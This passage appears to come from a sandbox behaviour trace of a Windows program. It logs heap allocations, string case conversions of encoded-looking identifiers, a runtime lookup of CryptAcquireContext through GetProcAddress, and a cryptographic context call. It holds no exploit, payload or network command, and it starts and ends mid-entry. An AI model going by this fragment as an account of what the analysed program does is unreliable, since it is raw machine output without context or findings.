returned 0x2a72b18 [0087.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0087.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0087.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684c8 | out: hHeap=0x2af0000) returned 1 [0087.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0087.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0087.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0087.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0087.968] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.968] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.969] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0087.969] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.969] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0087.969] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.970] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0087.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0087.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0087.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0087.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0087.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0087.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f71e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0087.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0087.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0087.971] GetProcAddress (hModule=0x76390000, lpProcName="CryptAcquireContext") returned 0x0 [0087.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0087.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0087.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0087.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa60d0 [0087.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0087.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0087.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15) returned 0x29f6fc0 [0087.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fc0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0087.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0087.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0087.972] GetProcAddress (hModule=0x76390000, lpProcName="CryptAcquireContextA") returned 0x763afc40 [0087.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0087.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0087.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa60d0 | out: hHeap=0x2af0000) returned 1 [0087.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0087.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7140 [0087.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0087.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0087.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0087.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0087.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0087.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0087.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0087.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0087.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0087.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0087.972] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9961a8) returned 1 [0087.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0087.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0087.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0087.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0087.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0087.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0087.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0087.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0087.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0087.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0087.975] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.975] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0087.975] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0087.975] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.975] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0087.975] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.975] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, 